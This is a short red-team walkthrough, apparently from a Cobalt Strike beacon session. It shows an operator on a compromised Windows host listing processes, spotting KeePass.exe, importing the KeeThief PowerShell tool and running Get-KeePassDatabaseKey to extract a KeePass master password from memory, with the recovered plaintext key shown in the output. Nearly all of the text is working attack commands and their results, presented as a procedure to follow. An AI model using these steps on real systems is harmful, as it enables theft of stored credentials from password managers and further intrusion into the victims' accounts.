We will use KeeThief
GitHub: https://github.com/GhostPack/KeeThief
beacon> ps
[*] Tasked beacon to list processes
[+] host called home, sent: 12 bytes
[*] Process List
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
0 0 [System Process]
4 0 System
68 4 Registry
100 548 svchost.exe
308 4 smss.exe
[SNIP]
10196 4968 KeePass.exe x64 1 COVERTIUS\\mnelson
10336 5944 regsvr32.exe x64 1 COVERTIUS\\mnelson
beacon> powershell-import
[*] Tasked beacon to import: /root/Tools/KeeThief/PowerShell/KeeThief.ps1
[+] host called home, sent: 358320 bytes
beacon> powerpick Get-KeePassDatabaseKey
[+] host called home, sent: 10 bytes
[*] Tasked beacon to run: Get-KeePassDatabaseKey (unmanaged)
[+] host called home, sent: 133705 bytes
[+] received output:
Database : C:\\Users\\Public\\Desktop\\KeePass-2.35\\MySecrets.kdbx
KeyType : KcpPassword
KeePassVersion : 2.35.0.0
ProcessID : 4784
ExecutablePath : C:\\Users\\Public\\Desktop\\KeePass-2.35\\KeePass.exe
EncryptedBlobAddress : 46338032
EncryptedBlob : {148, 171, 5, 208...}
EncryptedBlobLen : 32
PlaintextBlob : {80, 97, 115, 115...}
Plaintext : PasswordPasswordPassword